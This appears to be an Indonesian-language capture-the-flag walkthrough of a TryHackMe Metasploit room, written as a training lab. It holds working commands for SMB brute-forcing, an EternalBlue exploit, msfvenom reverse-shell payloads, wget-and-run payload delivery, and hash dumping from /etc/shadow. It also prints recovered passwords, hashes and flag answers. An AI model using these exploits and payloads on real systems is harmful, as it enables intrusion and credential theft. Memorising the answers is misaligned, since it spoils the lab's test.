Exploitation Basic Part 2
Metasploit: Exploitation
Room ini membahas penggunaan Metasploit untuk pemindaian kerentanan dan eksploitasi. Kamu akan belajar cara memindai target, mengelola hasil pengujian dengan fitur database Metasploit, melakukan vulnerability scan, serta mengeksploitasi layanan yang rentan. Selain itu, dijelaskan juga cara membuat payload menggunakan msfvenom dan mendapatkan sesi Meterpreter di berbagai platform target. Untuk serangan yang membutuhkan wordlist, digunakan file khusus di AttackBox, dan praktik dilakukan dengan menjalankan msfconsole.
wordlists yang nanti akan digunakan: /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
Scanning
PORT SCANNING DENGAN METASPLOIT
- Metasploit punya banyak module untuk scanning port dan service
- Jalankan Metasploit dengan:
msfconsole
MENCARI MODULE PORT SCAN
- Gunakan perintah:
search portscan - Contoh module:
- auxiliary/scanner/portscan/tcp
- auxiliary/scanner/portscan/syn
- auxiliary/scanner/portscan/ack
- auxiliary/scanner/portscan/xmas
MENGGUNAKAN MODULE
- Pilih module:
use auxiliary/scanner/portscan/tcp - Lihat opsi module:
show options
OPSI PENTING PORT SCAN
- RHOSTS Target IP atau jaringan yang akan discan
- PORTS Rentang port (contoh: 1-10000)
- THREADS Jumlah thread yang berjalan bersamaan
- CONCURRENCY Jumlah port yang dicek secara paralel per host
- TIMEOUT Batas waktu koneksi per port
CATATAN PORT SCAN
- Metasploit scan port secara berurutan
- Berbeda dengan Nmap yang scan 1000 port paling umum
- Metasploit tidak secepat Nmap untuk port scanning besar
MENJALANKAN NMAP DI MSFCONSOLE
- Bisa langsung jalankan Nmap:
nmap -sS <IP_TARGET> - Lebih cepat untuk tahap information gathering
UDP SERVICE IDENTIFICATION
- Gunakan module:
auxiliary/scanner/discovery/udp_sweep - Fungsi:
- Deteksi service UDP umum
- Contoh: DNS, NetBIOS
- Tidak melakukan full UDP scan
SMB SCANNING
- Module SMB yang sering digunakan:
- auxiliary/scanner/smb/smb_version
- auxiliary/scanner/smb/smb_enumshares
- Informasi yang didapat:
- Versi OS
- Nama host
- Workgroup
- Versi SMB
NETBIOS ENUMERATION
- NetBIOS digunakan untuk komunikasi jaringan
- Nama NetBIOS bisa menunjukkan fungsi mesin
- Contoh: DC, DEV, SALES
- Bisa ditemukan shared folder
- Kadang share bisa diakses tanpa password atau password lemah
Answer Questions
msfconsole
search portscan
use auxiliary/scanner/portscan/tcp
show options
msf6 auxiliary(scanner/portscan/tcp) > nmap -sS 10.48.157.47
# PORT STATE SERVICE
# 21/tcp open ftp
# 22/tcp open ssh
# 139/tcp open netbios-ssn
# 445/tcp open microsoft-ds
# 8000/tcp open http-alt
set RHOSTS 10.48.157.47
run
# [+] 10.48.157.47 - 10.48.157.47:21 - TCP OPEN
# [+] 10.48.157.47 - 10.48.157.47:22 - TCP OPEN
# [+] 10.48.157.47 - 10.48.157.47:139 - TCP OPEN
# [+] 10.48.157.47 - 10.48.157.47:445 - TCP OPEN
# [+] 10.48.157.47 - 10.48.157.47:8000 - TCP OPEN
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS 10.48.157.47
# *] Discovered NetBIOS on 10.48.157.47:137 (IP-10-48-157-47:<00>:U :IP-10-48-157-47:<03>:U :IP-10-48-157-47:<20>:U :__MSBROWSE__:<01>:G :ACME IT SUPPORT:<00>:G :ACME IT SUPPORT:<1d>:U :ACME IT SUPPORT:<1e>:G :00:00:00:00:00:00)
use auxiliary/scanner/smb/smb_version
setg RHOSTS 10.48.157.47
# [*] 10.48.157.47:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{312d7069-2d30-3834-2d31-35372d343700}) (authentication domain:IP-10-48-157-47)
# [+] 10.48.157.47:445 - Host is running Version 6.1.0 (unknown OS)- How many ports are open on the target system?
- You can use the portscanner module on Metasploit.
5

use auxiliary/scanner/netbios/nbname
run
# [+] 10.48.157.47 [IP-10-48-157-47] OS:Unix Names:(IP-10-48-157-47, __MSBROWSE__, ACME IT SUPPORT) Addresses:(10.48.157.47) Mac:00:00:00:00:00:00- Using the relevant scanner, what NetBIOS name can you see?
- use the netbios/nbname module.
ACME IT SUPPORT
curl http://10.48.157.47:8000use auxiliary/scanner/http/http_version
set RPORT 8000
run
# [+] 10.48.157.47:8000 webfs/1.21 ( 403-Forbidden )- What is running on port 8000?
- Use the http_version module.
webfs/1.21
use auxiliary/scanner/smb/smb_login
set SMBUser "penny"
set SMBPass file:///usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
run
# gagal
unset SMBPass
set PASS_FILE /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
run
# [*] 10.48.157.47:445 - 10.48.157.47:445 - Starting SMB login bruteforce
# [-] 10.48.157.47:445 - 10.48.157.47:445 - Failed: '.\penny:95',
# [-] 10.48.157.47:445 - 10.48.157.47:445 - Failed: '.\penny:98',
# [-] 10.48.157.47:445 - 10.48.157.47:445 - Failed: '.\penny:2003',
# [...]
# [+] 10.48.157.47:445 - 10.48.157.47:445 - Success: '.\penny:leo1234'- What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task.
leo1234
The Metasploit Database
1. Fungsi Metasploit Database
Metasploit menyediakan fitur database untuk membantu pengelolaan proyek penetration testing, terutama ketika menangani banyak target. Database ini menyimpan informasi seperti host, layanan, hasil scan, dan kerentanan agar tidak membingungkan saat pengujian.
Di TryHackMe AttackBox, database sudah aktif secara default. Langkah inisialisasi hanya diperlukan jika menggunakan Kali Linux atau instalasi Metasploit sendiri.
2. Inisialisasi Database Metasploit
Langkah umum yang diperlukan:
- Menjalankan PostgreSQL:
systemctl start postgresql - Inisialisasi database Metasploit:
sudo -u postgres msfdb init - Untuk menghapus database lama:
sudo -u postgres msfdb delete
Setelah selesai, database siap digunakan oleh Metasploit.
3. Mengecek Status Database
Setelah masuk ke msfconsole, status database dapat dicek dengan:
db_statusJika berhasil, akan muncul:
Connected to msf. Connection type: postgresql.4. Workspace (Manajemen Proyek)
Workspace digunakan untuk memisahkan proyek atau target berbeda. Perintah penting:
- Melihat workspace:
workspace - Menambah workspace:
workspace -a nama_workspace - Berpindah workspace:
workspace nama_workspace - Menghapus workspace:
workspace -d nama_workspace
Workspace aktif ditandai dengan simbol *.
5. Perintah Database di Metasploit
Saat database aktif, tersedia perintah tambahan seperti:
hosts→ menampilkan daftar hostservices→ menampilkan layanan terbukavulns→ daftar kerentananloot→ data hasil eksploitasidb_nmap→ menjalankan Nmap dan otomatis menyimpan hasilnya
6. Scanning dengan db_nmap
Menggunakan db_nmap, hasil scan Nmap akan langsung tersimpan di database:
db_nmap -sV -p- <IP_TARGET>Hasil scan bisa dilihat kembali menggunakan:
hosts
services7. Menggunakan Data Host yang Tersimpan
IP target yang tersimpan di database dapat langsung digunakan sebagai RHOSTS:
hosts -RContoh penggunaan modul:
use auxiliary/scanner/smb/smb_ms17_010
hosts -R
show options
runJika ada banyak host, semuanya akan otomatis dimasukkan ke RHOSTS.
8. Pencarian Layanan Spesifik
Untuk mencari layanan tertentu:
services -S <nama_service>Contoh:
services -S netbios9. Low-Hanging Fruit (Target Mudah)
Beberapa layanan yang sering menjadi target awal:
- HTTP → SQL Injection, RCE
- FTP → Anonymous login
- SMB → MS17-010
- SSH → Password lemah
- RDP → BlueKeep atau kredensial lemah
systemctl start postgresql
sudo -u postgres msfdb init
db_status
# [*] Connected to msfdb. Connection type: postgresql.workspace
workspace -a tryhackme
# [*] Added workspace: tryhackme
# [*] Workspace: tryhackme
workspace defaultdb_nmap -sV -p- 10.48.157.47
hosts # show hosts in db
hosts -R # auto set RHOSTS for hosts in db
# address mac name os_name os_flavor os_sp purpose info comments
# ------- --- ---- ------- --------- ----- ------- ---- --------
# 10.10.205.0
# 10.10.224.231
# 10.48.157.47 ip-10-48-157-47 Unknown device
# RHOSTS => 10.10.205.0 10.10.224.231 10.48.157.47
ervices -S netbios
# host port proto name state info
# ---- ---- ----- ---- ----- ----
# 10.48.157.47 137 udp netbios open IP-10-48-157-47:<00>:U :IP-10-48-157-47:<03>:U :IP-10-48-157-47:<20>:U :__MSBROWSE__:<01>:G :ACME IT
# SUPPORT:<00>:G :ACME IT SUPPORT:<1d>:U :ACME IT SUPPORT:<1e>:G :00:00:00:00:00:00
# 10.48.157.47 139 tcp netbios-ssn open Samba smbd 4.6.2
# 10.48.157.47 445 tcp netbios-ssn open Samba smbd 4.6.2Vulnerability Scanning
1. Konsep Vulnerability Scanning
Metasploit memungkinkan kita dengan cepat menemukan kerentanan kritis yang sering disebut sebagai “low hanging fruit”.
Low hanging fruit adalah:
- Kerentanan yang mudah diidentifikasi
- Mudah dieksploitasi
- Berpotensi memberikan akses awal (foothold) ke sistem
- Dalam beberapa kasus dapat memberikan hak akses tinggi seperti root atau administrator
2. Pentingnya Scanning dan Fingerprinting
Keberhasilan pencarian kerentanan sangat bergantung pada:
- Scanning (menemukan port dan service)
- Fingerprinting (mengidentifikasi jenis layanan dan versinya)
Semakin baik hasil scanning, semakin banyak modul Metasploit yang bisa dimanfaatkan.
Contoh:
- Jika ditemukan layanan VNC, kita bisa mencari modul terkait VNC di Metasploit.
- Awalnya mungkin hanya tersedia payload atau post module, namun belum tentu ada exploit.
- Untuk VNC, tersedia beberapa scanner module yang sangat berguna.
3. Contoh Modul Scanner VNC
Metasploit menyediakan beberapa modul scanner untuk VNC, seperti:
auxiliary/scanner/vnc/ard_root_pwauxiliary/scanner/vnc/vnc_loginauxiliary/scanner/vnc/vnc_none_auth
Modul-modul ini digunakan untuk mengecek autentikasi VNC, bukan langsung mengeksploitasi sistem.
4. Perintah info pada Modul
Perintah info digunakan untuk:
- Mengetahui fungsi modul
- Melihat opsi konfigurasi
- Memahami cara kerja modul
Contoh:
info5. Modul vnc_login
Modul auxiliary/scanner/vnc/vnc_login berfungsi untuk:
- Melakukan brute-force login VNC
- Mencoba password kosong
- Menggunakan wordlist
- Mengambil kredensial dari database Metasploit
Fitur penting:
- Mendukung beberapa versi protokol RFB
- Menampilkan login yang berhasil
- Bisa menggunakan user/password dari database
- Bisa berhenti otomatis saat login berhasil
6. Kegunaan Modul vnc_login
Modul ini sangat berguna untuk:
- Menemukan kredensial VNC yang lemah
- Mengidentifikasi sistem dengan keamanan buruk
- Mendapatkan akses awal ke target tanpa eksploit kompleks
7. Kesimpulan
Vulnerability scanning di Metasploit:
- Fokus pada pencarian kerentanan mudah dieksploitasi
- Sangat bergantung pada hasil enumeration
- Menggunakan scanner modules seperti
vnc_loginuntuk menemukan celah autentikasi - Merupakan langkah awal penting sebelum melakukan eksploitasi lanjutan
Answer Questions
search smtp
# auxiliary/scanner/smtp/smtp_relay
info auxiliary/scanner/smtp/smtp_relay
# Provided by:
# Campbell Murray
# xistence <xistence@0x90.nl>- Who wrote the module that allows us to check SMTP servers for open relay?
- search -> use -> info
Campbell Murray
Exploitation
1. Metasploit sebagai Exploitation Framework
Metasploit adalah framework eksploitasi yang berfokus pada pemanfaatan kerentanan. Kategori modul exploit adalah yang paling banyak dibandingkan modul lainnya.
Komponen utama Metasploit:
- Exploit → kode untuk memanfaatkan kerentanan
- Payload → aksi setelah eksploit berhasil (shell, meterpreter, dll)
- Auxiliary → scanning dan enumeration
- Post → aktivitas pasca eksploitasi
2. Mencari dan Memilih Exploit
Beberapa perintah penting:
search→ mencari exploitinfo→ melihat detail exploituse→ menggunakan exploitexploit/run→ menjalankan exploit
Keberhasilan eksploitasi sangat bergantung pada pemahaman service dan OS target.
3. Payload dalam Exploit
Setiap exploit biasanya memiliki payload default, namun payload lain bisa dipilih dengan:
show payloadsPayload menentukan:
- Jenis akses (shell, meterpreter)
- Arah koneksi (bind / reverse)
- Arsitektur target (x86 / x64)
4. Contoh: MS17-010 (EternalBlue)
Exploit:
exploit/windows/smb/ms17_010_eternalblueContoh payload:
generic/shell_reverse_tcpPayload reverse membutuhkan:
LHOST→ IP attackerLPORT→ port listener
5. Konfigurasi Exploit
Langkah umum:
- Pilih payload:
set payload generic/shell_reverse_tcp - Atur parameter:
set RHOSTS <IP_TARGET> set LHOST <IP_ATTACKER> - Cek konfigurasi:
show options - Jalankan exploit:
exploit
6. Proses Eksploitasi
Saat exploit dijalankan:
- Metasploit mengecek kerentanan target
- Menyesuaikan OS dan arsitektur
- Menjalankan exploit
- Membuka session shell jika berhasil
Jika sukses, attacker mendapatkan command shell pada sistem target.
7. Session Management
Setelah exploit berhasil, Metasploit membuat session.
Perintah penting:
- Melihat session aktif:
sessions - Background session:
CTRL + Z - Interaksi dengan session:
sessions -i <ID> - Menghentikan session:
sessions -k <ID>
8. Kegunaan Background Session
Background session berguna untuk:
- Menyerang lebih dari satu target
- Menggunakan exploit lain pada target yang sama
- Mengelola banyak shell sekaligus
9. Kesimpulan
Materi ini menjelaskan bahwa:
- Metasploit sangat efektif untuk eksploitasi kerentanan
- Pemilihan payload sangat penting dan kadang perlu trial & error
- Reverse shell memerlukan konfigurasi
LHOST - Session memungkinkan kontrol lanjutan terhadap target
- Manajemen session sangat penting dalam penetration testing nyata
Answers Questions
use exploit/windows/smb/ms17_010_eternalblue
show payloads
set payload generic/shell_bind_tcp # default payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp # metrepreter payload
# set LHOST 10.48.116.168
# set RHOST 10.48.116.168
set LHOST 10.48.88.150
set RHOST 10.48.88.150
set RHOSTS 10.48.191.225
exploit
# [*] Command shell session 1 opened (10.48.116.168:34837 -> 10.48.191.225:4444) at 2026-01-13 15:24:07 +0000]Ctrl + Z
Background session 1? [y/N] y
sessions
Active sessions
# ===============
# Id Name Type Information Connection
# -- ---- ---- ----------- ----------
# 1 shell x64/windows Shell Banner: Microsoft Windows [Version 6.1.7601] ----- 10.48.116.168:34837 -> 10.48.191.225:4444 (10.48.191.225)
sessions -h
sessions -i 1
# Microsoft Windows [Version 6.1.7601]
# C:\Windows\system32>
sessions -u 1
# [*] Upgrading session 1 to meterpreter...
search -f *flag*
# c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk 482 2019-03-17 19:26:42 +0000
# c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk 848 2019-03-17 19:30:04 +0000
# c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk 2344 2019-03-17 19:32:52 +0000
# c:\Users\Jon\Documents\flag.txt 15 2021-07-15 03:39:25 +0100
cat c:/Users/Jon/Documents/flag.txt
# THM-5455554845- What is the content of the flag.txt file?
- You can use Meterpreter's "search" command.
THM-5455554845
getuid
# Server username: NT AUTHORITY\SYSTEM
getsystem
# [-] Already running as SYSTEM
sysinfo
# Computer : JON-PC
# OS : Windows 7 (6.1 Build 7601, Service Pack 1).
# Architecture : x64
# System Language : en_US
# Domain : WORKGROUP
# Logged On Users : 0
# Meterpreter : x64/windows
hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::- What is the NTLM hash of the password of the user "pirate"?
8ce9a3ebd1647fcc5e04025019f4b875
Msfvenom
1. Pengertian MSFvenom
MSFvenom adalah tool dalam Metasploit Framework yang menggantikan msfpayload dan msfencode. Tool ini digunakan untuk:
- Membuat payload (reverse shell / meterpreter)
- Mendukung berbagai sistem operasi (Windows, Linux, Android, Apple, dll)
- Menghasilkan payload dalam berbagai format (exe, elf, php, asp, python, dll)
Untuk melihat seluruh payload yang tersedia:
msfvenom -l payloads2. Format Output Payload
MSFvenom dapat menghasilkan:
- Payload siap pakai (stand-alone) → misalnya file
.exe,.elf - Payload mentah (raw) → digunakan untuk scripting (PHP, Python)
Melihat format output yang tersedia:
msfvenom --list formats3. Encoder pada MSFvenom
Encoder digunakan untuk meng-encode payload, bukan secara langsung untuk bypass antivirus.
- Contoh encoder:
php/base64 - Encoder kadang efektif terhadap AV lama, namun obfuscation modern lebih disarankan
Contoh membuat payload PHP Meterpreter dengan encoding Base64:
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64Hasil payload akan berupa kode PHP yang diencode Base64 dan dieksekusi menggunakan eval(base64_decode()).
4. Konsep Handler (Catching a Shell)
Payload reverse shell membutuhkan listener untuk menerima koneksi dari target.
- Listener ini disebut handler
- Metasploit menyediakan modul exploit/multi/handler
- Handler bisa menangani shell biasa maupun Meterpreter
5. Contoh Skenario Serangan (Upload Vulnerability)
Langkah umum eksploitasi:
- Generate payload menggunakan MSFvenom
- Menjalankan handler Metasploit
- Menjalankan payload di target (misalnya lewat upload file)
- Mendapatkan reverse shell
6. Contoh Generate PHP Reverse Shell
msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw > reverse_shell.php⚠️ Catatan penting:
- File PHP hasil MSFvenom tidak memiliki tag
<?phpdan?> - Harus diedit manual agar bisa dieksekusi oleh web server
7. Menjalankan Multi/Handler
Langkah konfigurasi handler:
use exploit/multi/handler
set payload php/reverse_php
set LHOST 10.0.2.19
set LPORT 7777
runSetelah handler berjalan, sistem akan menunggu koneksi reverse shell dari target.
Jika payload adalah Meterpreter, maka shell yang diterima juga berupa Meterpreter session.
8. Contoh Payload untuk Berbagai Platform
Linux (.elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
chmod +x rev_shell.elf
./rev_shell.elfWindows (.exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exePHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.phpASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.aspPython
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py9. Kesimpulan
- MSFvenom digunakan untuk membuat payload reverse shell atau Meterpreter
- Payload harus sesuai dengan target sistem
- Handler (multi/handler) wajib dijalankan untuk menerima koneksi
- Encoder hanya mengubah bentuk payload, bukan solusi utama bypass antivirus
- Reverse payload selalu membutuhkan listener di mesin attacker
Answers Questions
msfvenom -l payloads
# aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
# aix/ppc/shell_find_port Spawn a shell on an established connection
# aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
# aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
msfvenom --list formats
# Framework Executable Formats [--format <value>]
# ===============================================
# Name
# ----
# asp
# aspx
# aspx-exe
# axis2
# [...]MYHOST=10.48.88.150
msfvenom -p php/meterpreter/reverse_tcp LHOST=$MYHOST -f raw -e php/base64MYHOST=10.48.88.150
msfvenom -p php/reverse_php LHOST=$MYHOST LPORT=7777 -f raw > reverse_shell.php
harus di edit manual dan menghapus tag ./*php nya biar bisa di run nantinya
di tag terakhirnya juga ya

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.48.88.150
set LPORT 7777
show options
run- Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type "sudo su" to get a root shell, this will make things easier.
TARGET VM LOGIN:
sudo su
# pass: 1q2w3e4r- Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).
ATTACKER:
MYHOST=10.48.88.150
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$MYHOST LPORT=4444 -f elf > shell.elf
python3 -m http.server
# Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...TARGET VM:
# curl http://10.48.88.150:8000/shell.elf -o shell.elf
wget http://10.48.88.150:8000/shell.elf
chmod +x shell.elf
./shell.elf
- Use a post exploitation module to dump hashes of other users on the system.
- use the post/linux/gather/hashdump module.
sysinfo
# Computer : ip-10-48-157-242.ap-south-1.compute.internal
# OS : Ubuntu 20.04 (Linux 5.15.0-1081-aws)
# Architecture : x64
# BuildTuple : i486-linux-musl
# Meterpreter : x86/linux
getuid
# Server username: root
backgroundsearch hashdump
use post/linux/gather/hashdump
sessions
# 5 meterpreter x86/linux root @ ip-10-48-157-242.ap-south-1.compute.internal 10.48.88.150:4444 -> 10.48.157.242:39322 (10.48.157.242)
set SESSION 5
runatau bisa juga langsung di meterpreternya
sessions -i 5
# meterpreter >
shell
cat /etc/shadow
# murphy:$6$qK0Kt4UO$HuCrlOJGbBJb5Av9SL7rEzbxcz/KZYFkMwUqAE0ZMDpNRmOHhPHeI2JU3m9OBOS7lUKkKMADLxCBcywzIxl7b.:18851:0:99999:7:::
# claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:18851:0:99999:7:::- What is the other user's password hash?
$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0